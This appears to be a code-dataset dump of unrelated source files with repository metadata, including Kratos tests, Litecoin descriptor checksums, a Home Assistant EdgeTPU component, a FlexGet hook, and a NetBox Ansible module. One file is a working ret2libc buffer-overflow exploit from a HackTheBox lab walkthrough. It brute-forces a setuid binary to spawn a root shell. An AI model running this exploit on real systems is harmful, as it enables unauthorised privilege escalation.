has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication")
def AssembleTestSuites():
suites = KratosUnittest.KratosSuites
smallSuite = suites['small']
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
SinglePatchTest,
TTrussElementTests,
MembraneSinglePatchFourPointSailLinearStatic,
MembraneSinglePatchFourPointSailNonLinearStatic,
TShell3pElementTests,
ScordelisRoofShell3pTest,
LinearBeamShell3pTest,
ScordelisRoofShell5pTest,
SinglePatchRefinedSupportPenaltyTest,
SinglePatchRefinedSupportLagrangeTest,
TwoPatchCouplingPenaltyShell3pTest,
TwoPatchCouplingLagrangeShell3pTest,
TwoPatchRefinedCouplingPenaltyMembraneTest,
TwoPatchRefinedCouplingLagrangeMembraneTest,
TwoPatchCantileverCouplingPenaltyTest,
TwoPatchCantileverRefinedCouplingPenaltyTest,
TTestNurbsVolumeElements,
TTestModelers
]))
if has_linear_solvers_application:
from KratosMultiphysics import LinearSolversApplication
if LinearSolversApplication.HasFEAST():
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
SinglePatchRefinedSupportNitscheTest,
TwoPatchCouplingNitscheShell3pTest,
TwoPatchRefinedCouplingNitscheMembraneTest
]))
else:
print("FEAST not available in LinearSolversApplication")
nightSuite = suites['nightly']
nightSuite.addTests(smallSuite)
nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
MembraneSinglePatchFourPointSailImplicitDynamic,
TShell5pHierarchicLinearThickBeamTest,
TShell5pHierarchicLinearScordelisTest,
TShell5pHierarchicNonLinearThickBeamTest
]))
allSuite = suites['all']
allSuite.addTests(nightSuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
| true | true |
f72ebf2c577dad9380f79aaf1c4edf5bb78e7756 | 2,106 | py | Python | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 20 | 2021-04-03T09:08:10.000Z | 2022-02-08T23:27:12.000Z | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 2 | 2021-04-03T05:41:45.000Z | 2021-09-30T09:38:36.000Z | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 3 | 2021-04-16T21:54:02.000Z | 2021-12-17T16:39:04.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 Pieter Wuille
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Utility functions related to output descriptors"""
INPUT_CHARSET = "0123456789()[],'/*abcdefgh@:$%{}IJKLMNOPQRSTUVWXYZ&+-.;<=>?!^_|~ijklmnopqrstuvwxyzABCDEFGH`#\"\\ "
CHECKSUM_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0xf5dee51989, 0xa9fdca3312, 0x1bab10e32d, 0x3706b1677a, 0x644d626ffd]
def descsum_polymod(symbols):
"""Internal function that computes the descriptor checksum."""
chk = 1
for value in symbols:
top = chk >> 35
chk = (chk & 0x7ffffffff) << 5 ^ value
for i in range(5):
chk ^= GENERATOR[i] if ((top >> i) & 1) else 0
return chk
def descsum_expand(s):
"""Internal function that does the character to symbol expansion"""
groups = []
symbols = []
for c in s:
if not c in INPUT_CHARSET:
return None
v = INPUT_CHARSET.find(c)
symbols.append(v & 31)
groups.append(v >> 5)
if len(groups) == 3:
symbols.append(groups[0] * 9 + groups[1] * 3 + groups[2])
groups = []
if len(groups) == 1:
symbols.append(groups[0])
elif len(groups) == 2:
symbols.append(groups[0] * 3 + groups[1])
return symbols
def descsum_create(s):
"""Add a checksum to a descriptor without"""
symbols = descsum_expand(s) + [0, 0, 0, 0, 0, 0, 0, 0]
checksum = descsum_polymod(symbols) ^ 1
return s + '#' + ''.join(CHECKSUM_CHARSET[(checksum >> (5 * (7 - i))) & 31] for i in range(8))
def descsum_check(s, require=True):
"""Verify that the checksum is correct in a descriptor"""
if not '#' in s:
return not require
if s[-9] != '#':
return False
if not all(x in CHECKSUM_CHARSET for x in s[-8:]):
return False
symbols = descsum_expand(s[:-9]) + [CHECKSUM_CHARSET.find(x) for x in s[-8:]]
return descsum_polymod(symbols) == 1
| 37.607143 | 116 | 0.603039 |
INPUT_CHARSET = "0123456789()[],'/*abcdefgh@:$%{}IJKLMNOPQRSTUVWXYZ&+-.;<=>?!^_|~ijklmnopqrstuvwxyzABCDEFGH`#\"\\ "
CHECKSUM_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0xf5dee51989, 0xa9fdca3312, 0x1bab10e32d, 0x3706b1677a, 0x644d626ffd]
def descsum_polymod(symbols):
chk = 1
for value in symbols:
top = chk >> 35
chk = (chk & 0x7ffffffff) << 5 ^ value
for i in range(5):
chk ^= GENERATOR[i] if ((top >> i) & 1) else 0
return chk
def descsum_expand(s):
groups = []
symbols = []
for c in s:
if not c in INPUT_CHARSET:
return None
v = INPUT_CHARSET.find(c)
symbols.append(v & 31)
groups.append(v >> 5)
if len(groups) == 3:
symbols.append(groups[0] * 9 + groups[1] * 3 + groups[2])
groups = []
if len(groups) == 1:
symbols.append(groups[0])
elif len(groups) == 2:
symbols.append(groups[0] * 3 + groups[1])
return symbols
def descsum_create(s):
symbols = descsum_expand(s) + [0, 0, 0, 0, 0, 0, 0, 0]
checksum = descsum_polymod(symbols) ^ 1
return s + '#' + ''.join(CHECKSUM_CHARSET[(checksum >> (5 * (7 - i))) & 31] for i in range(8))
def descsum_check(s, require=True):
if not '#' in s:
return not require
if s[-9] != '#':
return False
if not all(x in CHECKSUM_CHARSET for x in s[-8:]):
return False
symbols = descsum_expand(s[:-9]) + [CHECKSUM_CHARSET.find(x) for x in s[-8:]]
return descsum_polymod(symbols) == 1
| true | true |
f72ebf40c45cdd85f1466235d3246a9f0f02d062 | 263 | py | Python | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | 1 | 2022-03-18T02:53:26.000Z | 2022-03-18T02:53:26.000Z | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | 1 | 2022-02-26T22:33:51.000Z | 2022-02-26T22:33:51.000Z | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | null | null | null | import logging
import sys
import os
logging.basicConfig(
level=logging.getLevelName(os.getenv("LOG_LEVEL") or "INFO"),
format="[%(asctime)s] [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger = logging.getLogger()
| 21.916667 | 65 | 0.707224 | import logging
import sys
import os
logging.basicConfig(
level=logging.getLevelName(os.getenv("LOG_LEVEL") or "INFO"),
format="[%(asctime)s] [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger = logging.getLogger()
| true | true |
f72ebf692ce4d13b38c4b06937c4b2c86a362b7e | 810 | py | Python | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | null | null | null | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | null | null | null | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | 1 | 2021-07-27T12:56:03.000Z | 2021-07-27T12:56:03.000Z | #
# Privilege Escalation Exploit for hackTheBox October
#
# From IppSec https://youtu.be/K05mJazHhF4
#
from subprocess import call
import struct
# libc base address using:
# ldd /usr/local/bin/ovrflw | grep libc
libc_base_addr = 0xb75e0000
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
system_off = 0x00040310
exit_off = 0x00033260
# strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
binsh_off = 0x00162bac
binsh_addr = struct.pack("<I", libc_base_addr + binsh_off)
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
junk = ('A' * 112)
payload = junk + system_addr + exit_addr + binsh_addr
i = 0
while (i < 512):
print("Try: %s" % i)
i += 1
ret = call(["/usr/local/bin/ovrflw", payload])
| 21.891892 | 62 | 0.691358 |
from subprocess import call
import struct
libc_base_addr = 0xb75e0000
system_off = 0x00040310
exit_off = 0x00033260
binsh_off = 0x00162bac
binsh_addr = struct.pack("<I", libc_base_addr + binsh_off)
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
junk = ('A' * 112)
payload = junk + system_addr + exit_addr + binsh_addr
i = 0
while (i < 512):
print("Try: %s" % i)
i += 1
ret = call(["/usr/local/bin/ovrflw", payload])
| true | true |
f72ec08d1ab18ada95fe41cc5b706441b9da8ce8 | 6,871 | py | Python | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | """Support for performing EdgeTPU classification on images."""
import logging
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_ENTITY_ID, CONF_NAME, CONF_SOURCE, PLATFORM_SCHEMA,
ImageProcessingEntity)
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = 'matches'
ATTR_SUMMARY = 'summary'
ATTR_TOTAL_MATCHES = 'total_matches'
CONF_CATEGORIES = 'categories'
CONF_CATEGORY = 'category'
CONF_FILE_OUT = 'file_out'
CONF_PATH = 'path'
CONF_LABELS = 'labels'
CONF_MODEL = 'model'
CONF_MODEL_DIR = 'model_dir'
CONF_TPU_DEVICE = 'device'
CONF_TPU_TOP_K = 'top_k'
CONF_TPU_THRESHOLD = 'threshold'
CONF_TPU_KEEP_ASPECT_RATIO = 'keep_aspect_ratio'
CONF_TPU_RESAMPLE = 'resample'
DEFAULT_THRESHOLD = 0.05
DEFAULT_TOP_K = 10
DEFAULT_KEEP_ASPECT_RATIO = True
DEFAULT_RESAMPLE = 0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_FILE_OUT, default=[]):
vol.All(cv.ensure_list, [cv.template]),
vol.Required(CONF_MODEL): vol.Schema({
vol.Required(CONF_PATH): cv.isfile,
vol.Optional(CONF_LABELS): cv.isfile,
vol.Optional(CONF_MODEL_DIR): cv.isdir,
vol.Optional(CONF_TPU_DEVICE): cv.string,
vol.Optional(CONF_TPU_THRESHOLD, default=DEFAULT_THRESHOLD): cv.small_float,
vol.Optional(CONF_TPU_KEEP_ASPECT_RATIO, default=DEFAULT_KEEP_ASPECT_RATIO): cv.boolean,
vol.Optional(CONF_TPU_RESAMPLE, default=DEFAULT_RESAMPLE): cv.positive_int,
vol.Optional(CONF_TPU_TOP_K, default=DEFAULT_TOP_K): cv.positive_int,
})
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the EdgeTPU image processing platform."""
try:
# Verify that the TensorFlow Object Detection API is pre-installed
# pylint: disable=unused-import,unused-variable
from edgetpu.detection.engine import DetectionEngine
except ImportError:
# pylint: disable=line-too-long
_LOGGER.error(
"No EdgeTPU Object Detection library found! Install or compile ") # noqa
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(EdgeTPUImageProcessor(
hass, camera[CONF_ENTITY_ID], camera.get(CONF_NAME),
config))
add_entities(entities)
class EdgeTPUImageProcessor(ImageProcessingEntity):
"""Representation of an EdgeTPU image processor."""
def __init__(self, hass, camera_entity, name, config):
"""Initialize the EdgeTPU entity."""
from edgetpu.detection.engine import DetectionEngine # pylint: disable=import-error
model_config = config.get(CONF_MODEL)
_LOGGER.info("config = %s", model_config)
self.hass = hass
self._camera_entity = camera_entity
_LOGGER.info("camera = %s", self._camera_entity)
if name:
self._name = name
else:
self._name = "EdgeTPU {0}".format(
split_entity_id(camera_entity)[1])
self._file_out = config.get(CONF_FILE_OUT)
self._model = model_config.get(CONF_PATH)
self._threshold = model_config.get(CONF_TPU_THRESHOLD)
self._top_k = model_config.get(CONF_TPU_TOP_K)
self._keep_aspect_ratio = model_config.get(CONF_TPU_KEEP_ASPECT_RATIO)
self._resample = model_config.get(CONF_TPU_RESAMPLE)
self._engine = DetectionEngine(self._model, device_path=model_config.get(CONF_TPU_DEVICE))
labels = model_config.get(CONF_LABELS)
self._labels = self._read_label_file(labels) if labels else None
template.attach(hass, self._file_out)
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
"""Return camera entity id from process pictures."""
return self._camera_entity
@property
def name(self):
"""Return the name of the image processor."""
return self._name
@property
def state(self):
"""Return the state of the entity."""
return self._total_matches
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_MATCHES: self._matches,
# ATTR_SUMMARY: {item: len(values)
# for item, values in self._matches.items()},
ATTR_TOTAL_MATCHES: self._total_matches
}
# Function to read labels from text files.
def _read_label_file(self, file_path):
with open(file_path, 'r', encoding="utf-8") as source_file:
lines = source_file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def process_image(self, image):
"""Process the image."""
from PIL import Image
from PIL import ImageDraw
_LOGGER.debug("Model=%s", self._model)
matches = {}
total_matches = 0
# Open image.
# _LOGGER.info("image = %s", image)
import io
img = Image.open(io.BytesIO(bytearray(image)))
# img.save("/tmp/test.jpg")
draw = ImageDraw.Draw(img)
# Run inference.
ans = self._engine.DetectWithImage(img, threshold=self._threshold,
keep_aspect_ratio=self._keep_aspect_ratio,
relative_coord=False, top_k=self._top_k)
# Display result.
if ans:
for obj in ans:
_LOGGER.info("label_id = %d", obj.label_id)
if self._labels:
_LOGGER.info("label=%s", self._labels[obj.label_id])
_LOGGER.info("score = %f", obj.score)
box = obj.bounding_box.flatten().tolist()
_LOGGER.info("box = %s", box)
# Draw a rectangle.
draw.rectangle(box, outline='red')
if self._file_out:
for path_template in self._file_out:
if isinstance(path_template, template.Template):
img.save(path_template.render(
camera_entity=self._camera_entity))
else:
img.save(path_template)
if 'Face' not in matches.keys():
matches['Face'] = []
matches['Face'].append({
'score': float(obj.score),
'box': box
})
total_matches += 1
else:
_LOGGER.info("No object detected!")
self._matches = matches
self._total_matches = total_matches
| 35.973822 | 98 | 0.627129 | import logging
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_ENTITY_ID, CONF_NAME, CONF_SOURCE, PLATFORM_SCHEMA,
ImageProcessingEntity)
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = 'matches'
ATTR_SUMMARY = 'summary'
ATTR_TOTAL_MATCHES = 'total_matches'
CONF_CATEGORIES = 'categories'
CONF_CATEGORY = 'category'
CONF_FILE_OUT = 'file_out'
CONF_PATH = 'path'
CONF_LABELS = 'labels'
CONF_MODEL = 'model'
CONF_MODEL_DIR = 'model_dir'
CONF_TPU_DEVICE = 'device'
CONF_TPU_TOP_K = 'top_k'
CONF_TPU_THRESHOLD = 'threshold'
CONF_TPU_KEEP_ASPECT_RATIO = 'keep_aspect_ratio'
CONF_TPU_RESAMPLE = 'resample'
DEFAULT_THRESHOLD = 0.05
DEFAULT_TOP_K = 10
DEFAULT_KEEP_ASPECT_RATIO = True
DEFAULT_RESAMPLE = 0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_FILE_OUT, default=[]):
vol.All(cv.ensure_list, [cv.template]),
vol.Required(CONF_MODEL): vol.Schema({
vol.Required(CONF_PATH): cv.isfile,
vol.Optional(CONF_LABELS): cv.isfile,
vol.Optional(CONF_MODEL_DIR): cv.isdir,
vol.Optional(CONF_TPU_DEVICE): cv.string,
vol.Optional(CONF_TPU_THRESHOLD, default=DEFAULT_THRESHOLD): cv.small_float,
vol.Optional(CONF_TPU_KEEP_ASPECT_RATIO, default=DEFAULT_KEEP_ASPECT_RATIO): cv.boolean,
vol.Optional(CONF_TPU_RESAMPLE, default=DEFAULT_RESAMPLE): cv.positive_int,
vol.Optional(CONF_TPU_TOP_K, default=DEFAULT_TOP_K): cv.positive_int,
})
})
def setup_platform(hass, config, add_entities, discovery_info=None):
try:
from edgetpu.detection.engine import DetectionEngine
except ImportError:
_LOGGER.error(
"No EdgeTPU Object Detection library found! Install or compile ")
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(EdgeTPUImageProcessor(
hass, camera[CONF_ENTITY_ID], camera.get(CONF_NAME),
config))
add_entities(entities)
class EdgeTPUImageProcessor(ImageProcessingEntity):
def __init__(self, hass, camera_entity, name, config):
from edgetpu.detection.engine import DetectionEngine
model_config = config.get(CONF_MODEL)
_LOGGER.info("config = %s", model_config)
self.hass = hass
self._camera_entity = camera_entity
_LOGGER.info("camera = %s", self._camera_entity)
if name:
self._name = name
else:
self._name = "EdgeTPU {0}".format(
split_entity_id(camera_entity)[1])
self._file_out = config.get(CONF_FILE_OUT)
self._model = model_config.get(CONF_PATH)
self._threshold = model_config.get(CONF_TPU_THRESHOLD)
self._top_k = model_config.get(CONF_TPU_TOP_K)
self._keep_aspect_ratio = model_config.get(CONF_TPU_KEEP_ASPECT_RATIO)
self._resample = model_config.get(CONF_TPU_RESAMPLE)
self._engine = DetectionEngine(self._model, device_path=model_config.get(CONF_TPU_DEVICE))
labels = model_config.get(CONF_LABELS)
self._labels = self._read_label_file(labels) if labels else None
template.attach(hass, self._file_out)
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
return self._camera_entity
@property
def name(self):
return self._name
@property
def state(self):
return self._total_matches
@property
def device_state_attributes(self):
return {
ATTR_MATCHES: self._matches,
ATTR_TOTAL_MATCHES: self._total_matches
}
def _read_label_file(self, file_path):
with open(file_path, 'r', encoding="utf-8") as source_file:
lines = source_file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def process_image(self, image):
from PIL import Image
from PIL import ImageDraw
_LOGGER.debug("Model=%s", self._model)
matches = {}
total_matches = 0
import io
img = Image.open(io.BytesIO(bytearray(image)))
draw = ImageDraw.Draw(img)
ans = self._engine.DetectWithImage(img, threshold=self._threshold,
keep_aspect_ratio=self._keep_aspect_ratio,
relative_coord=False, top_k=self._top_k)
if ans:
for obj in ans:
_LOGGER.info("label_id = %d", obj.label_id)
if self._labels:
_LOGGER.info("label=%s", self._labels[obj.label_id])
_LOGGER.info("score = %f", obj.score)
box = obj.bounding_box.flatten().tolist()
_LOGGER.info("box = %s", box)
draw.rectangle(box, outline='red')
if self._file_out:
for path_template in self._file_out:
if isinstance(path_template, template.Template):
img.save(path_template.render(
camera_entity=self._camera_entity))
else:
img.save(path_template)
if 'Face' not in matches.keys():
matches['Face'] = []
matches['Face'].append({
'score': float(obj.score),
'box': box
})
total_matches += 1
else:
_LOGGER.info("No object detected!")
self._matches = matches
self._total_matches = total_matches
| true | true |
f72ec0d8575ad1e8a480b6dfdd46dd3ea6886bf8 | 852 | py | Python | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | 1 | 2017-08-25T07:17:04.000Z | 2017-08-25T07:17:04.000Z | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | 1 | 2015-11-10T01:07:54.000Z | 2015-11-10T01:07:54.000Z | flexget/plugins/generic/db_vacuum.py | Konubinix/Flexget | 1379e346370ef144b9a02f761fc187497b6097e2 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals, division, absolute_import
import logging
from datetime import datetime, timedelta
from flexget.utils.simple_persistence import SimplePersistence
from flexget.event import event
log = logging.getLogger('db_vacuum')
VACUUM_INTERVAL = timedelta(weeks=24) # 6 months
# Run after the cleanup is actually finished, but before analyze
@event('manager.db_cleanup', 1)
def on_cleanup(manager, session):
# Vacuum can take a long time, and is not needed frequently
persistence = SimplePersistence('db_vacuum')
last_vacuum = persistence.get('last_vacuum')
if not last_vacuum or last_vacuum < datetime.now() - VACUUM_INTERVAL:
log.info('Running VACUUM on database to improve performance and decrease db size.')
session.execute('VACUUM')
persistence['last_vacuum'] = datetime.now()
| 40.571429 | 91 | 0.766432 | from __future__ import unicode_literals, division, absolute_import
import logging
from datetime import datetime, timedelta
from flexget.utils.simple_persistence import SimplePersistence
from flexget.event import event
log = logging.getLogger('db_vacuum')
VACUUM_INTERVAL = timedelta(weeks=24)
@event('manager.db_cleanup', 1)
def on_cleanup(manager, session):
persistence = SimplePersistence('db_vacuum')
last_vacuum = persistence.get('last_vacuum')
if not last_vacuum or last_vacuum < datetime.now() - VACUUM_INTERVAL:
log.info('Running VACUUM on database to improve performance and decrease db size.')
session.execute('VACUUM')
persistence['last_vacuum'] = datetime.now()
| true | true |
f72ec1736a03659240a215c3e1fbd08ab2fda8f4 | 4,325 | py | Python | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/netbox/netbox/plugins/modules/netbox_ipam_role.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Mikhail Yohman (@FragmentedPacket)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: netbox_ipam_role
short_description: Creates or removes ipam roles from Netbox
description:
- Creates or removes ipam roles from Netbox
notes:
- Tags should be defined as a YAML list
- This should be ran with connection C(local) and hosts C(localhost)
author:
- Mikhail Yohman (@FragmentedPacket)
requirements:
- pynetbox
version_added: "0.1.0"
options:
netbox_url:
description:
- URL of the Netbox instance resolvable by Ansible control host
required: true
type: str
netbox_token:
description:
- The token created within Netbox to authorize API access
required: true
type: str
data:
type: dict
description:
- Defines the ipam role configuration
suboptions:
name:
description:
- Name of the ipam role to be created
required: true
type: str
slug:
description:
- The slugified version of the name or custom slug.
- This is auto-generated following NetBox rules if not provided
required: false
type: str
weight:
description:
- The weight of the ipam role to be created
required: false
type: int
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
choices: [ absent, present ]
default: present
type: str
query_params:
description:
- This can be used to override the specified values in ALLOWED_QUERY_PARAMS that is defined
- in plugins/module_utils/netbox_utils.py and provides control to users on what may make
- an object unique in their environment.
required: false
type: list
elements: str
validate_certs:
description:
- |
If C(no), SSL certificates will not be validated.
This should only be used on personally controlled sites using self-signed certificates.
default: true
type: raw
"""
EXAMPLES = r"""
- name: "Test Netbox module"
connection: local
hosts: localhost
gather_facts: False
tasks:
- name: Create ipam role within Netbox with only required information
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: present
- name: Delete ipam role within netbox
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: absent
"""
RETURN = r"""
role:
description: Serialized object as created or already existent within Netbox
returned: on creation
type: dict
msg:
description: Message indicating failure or info about what has been achieved
returned: always
type: str
"""
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_utils import (
NetboxAnsibleModule,
NETBOX_ARG_SPEC,
)
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_ipam import (
NetboxIpamModule,
NB_IPAM_ROLES,
)
from copy import deepcopy
def main():
"""
Main entry point for module execution
"""
argument_spec = deepcopy(NETBOX_ARG_SPEC)
argument_spec.update(
dict(
data=dict(
type="dict",
required=True,
options=dict(
name=dict(required=True, type="str"),
slug=dict(required=False, type="str"),
weight=dict(required=False, type="int"),
),
),
)
)
required_if = [("state", "present", ["name"]), ("state", "absent", ["name"])]
module = NetboxAnsibleModule(
argument_spec=argument_spec, supports_check_mode=True, required_if=required_if
)
netbox_ipam_role = NetboxIpamModule(module, NB_IPAM_ROLES)
netbox_ipam_role.run()
if __name__ == "__main__": # pragma: no cover
main()
| 26.697531 | 97 | 0.652948 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: netbox_ipam_role
short_description: Creates or removes ipam roles from Netbox
description:
- Creates or removes ipam roles from Netbox
notes:
- Tags should be defined as a YAML list
- This should be ran with connection C(local) and hosts C(localhost)
author:
- Mikhail Yohman (@FragmentedPacket)
requirements:
- pynetbox
version_added: "0.1.0"
options:
netbox_url:
description:
- URL of the Netbox instance resolvable by Ansible control host
required: true
type: str
netbox_token:
description:
- The token created within Netbox to authorize API access
required: true
type: str
data:
type: dict
description:
- Defines the ipam role configuration
suboptions:
name:
description:
- Name of the ipam role to be created
required: true
type: str
slug:
description:
- The slugified version of the name or custom slug.
- This is auto-generated following NetBox rules if not provided
required: false
type: str
weight:
description:
- The weight of the ipam role to be created
required: false
type: int
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
choices: [ absent, present ]
default: present
type: str
query_params:
description:
- This can be used to override the specified values in ALLOWED_QUERY_PARAMS that is defined
- in plugins/module_utils/netbox_utils.py and provides control to users on what may make
- an object unique in their environment.
required: false
type: list
elements: str
validate_certs:
description:
- |
If C(no), SSL certificates will not be validated.
This should only be used on personally controlled sites using self-signed certificates.
default: true
type: raw
"""
EXAMPLES = r"""
- name: "Test Netbox module"
connection: local
hosts: localhost
gather_facts: False
tasks:
- name: Create ipam role within Netbox with only required information
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: present
- name: Delete ipam role within netbox
netbox_ipam_role:
netbox_url: http://netbox.local
netbox_token: thisIsMyToken
data:
name: Test IPAM Role
state: absent
"""
RETURN = r"""
role:
description: Serialized object as created or already existent within Netbox
returned: on creation
type: dict
msg:
description: Message indicating failure or info about what has been achieved
returned: always
type: str
"""
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_utils import (
NetboxAnsibleModule,
NETBOX_ARG_SPEC,
)
from ansible_collections.netbox.netbox.plugins.module_utils.netbox_ipam import (
NetboxIpamModule,
NB_IPAM_ROLES,
)
from copy import deepcopy
def main():
argument_spec = deepcopy(NETBOX_ARG_SPEC)
argument_spec.update(
dict(
data=dict(
type="dict",
required=True,
options=dict(
name=dict(required=True, type="str"),
slug=dict(required=False, type="str"),
weight=dict(required=False, type="int"),
),
),
)
)
required_if = [("state", "present", ["name"]), ("state", "absent", ["name"])]
module = NetboxAnsibleModule(
argument_spec=argument_spec, supports_check_mode=True, required_if=required_if
)
netbox_ipam_role = NetboxIpamModule(module, NB_IPAM_ROLES)
netbox_ipam_role.run()
if __name__ == "__main__":
main()
| true | true |
f72ec1db4dbbb5d7b20d5ea18b138b8111539f7c | 17,753 | py | Python | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 5 | 2015-02-27T21:42:28.000Z | 2021-10-10T23:36:08.000Z | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | build/libraries.py | lutris/openmsx | 91ed35400c7b4c8c460004710736af9abc4dde29 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2 | 2015-06-15T09:57:56.000Z | 2017-05-14T01:11:48.000Z | # Some notes about static linking:
# There are two ways of linking to static library: using the -l command line
# option or specifying the full path to the library file as one of the inputs.
# When using the -l option, the library search paths will be searched for a
# dynamic version of the library, if that is not found, the search paths will
# be searched for a static version of the library. This means we cannot force
# static linking of a library this way. It is possible to force static linking
# of all libraries, but we want to control it per library.
# Conclusion: We have to specify the full path to each library that should be
# linked statically.
from executils import captureStdout, shjoin
from os import listdir
from os.path import isdir, isfile
from os import environ
class Library(object):
	'''Describes an external library and how to locate, compile against
	and link against it on the various target platforms.

	Concrete libraries are modelled as subclasses that override the class
	attributes below; all behaviour is implemented as classmethods, so
	these classes are never instantiated.
	'''
	# Base name of the library file: the "x" in "-lx" / "libx.a".
	libName = None
	# NOTE(review): not referenced in this class; presumably the name used
	# for this library elsewhere in the build system — confirm against callers.
	makeName = None
	# Header file name(s): either a single header or a sequence of headers
	# (see getHeaders()).
	header = None
	# Name of the library's config script (e.g. "sdl-config"), or None if
	# the library has no config script (see getConfigScript()).
	configScriptName = None
	# Config script option that prints the dynamic link flags.
	dynamicLibsOption = '--libs'
